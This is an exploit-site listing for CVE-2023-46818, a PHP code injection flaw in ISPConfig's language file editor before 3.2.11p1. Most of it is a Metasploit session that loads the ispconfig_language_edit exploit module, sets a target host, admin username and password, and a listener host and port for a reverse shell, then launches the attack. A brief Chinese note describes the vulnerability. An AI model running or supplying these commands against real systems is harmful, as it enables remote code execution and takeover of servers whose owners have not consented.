Sploitus

Exploit for CVE-2023-46818

kitploit · 2026-08-27

Exploit Code

MARKDOWN20 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SYFI-CVE-2023-46818
# Metasploit 模块

Metasploit 模块

![图片](https://assets.kitploit.com/production/public/readmes/20941/a80281e467df7c782a0faab58b2314c4f09842b7092143cad853737ffb13740e.png)

root@kitploit:~
    
    
    use exploit/linux/http/ispconfig_language_edit
    set RHOSTS target.com
    set USERNAME admin
    set PASSWORD password123
    set LHOST 127.0.0.1
    set LPORT 4444
    exploit
    

在 ISPConfig 3.2.11p1 之前版本中发现了一个问题。如果启用了 admin_allow_langedit,管理员可以通过语言文件编辑器实现 PHP 代码注入。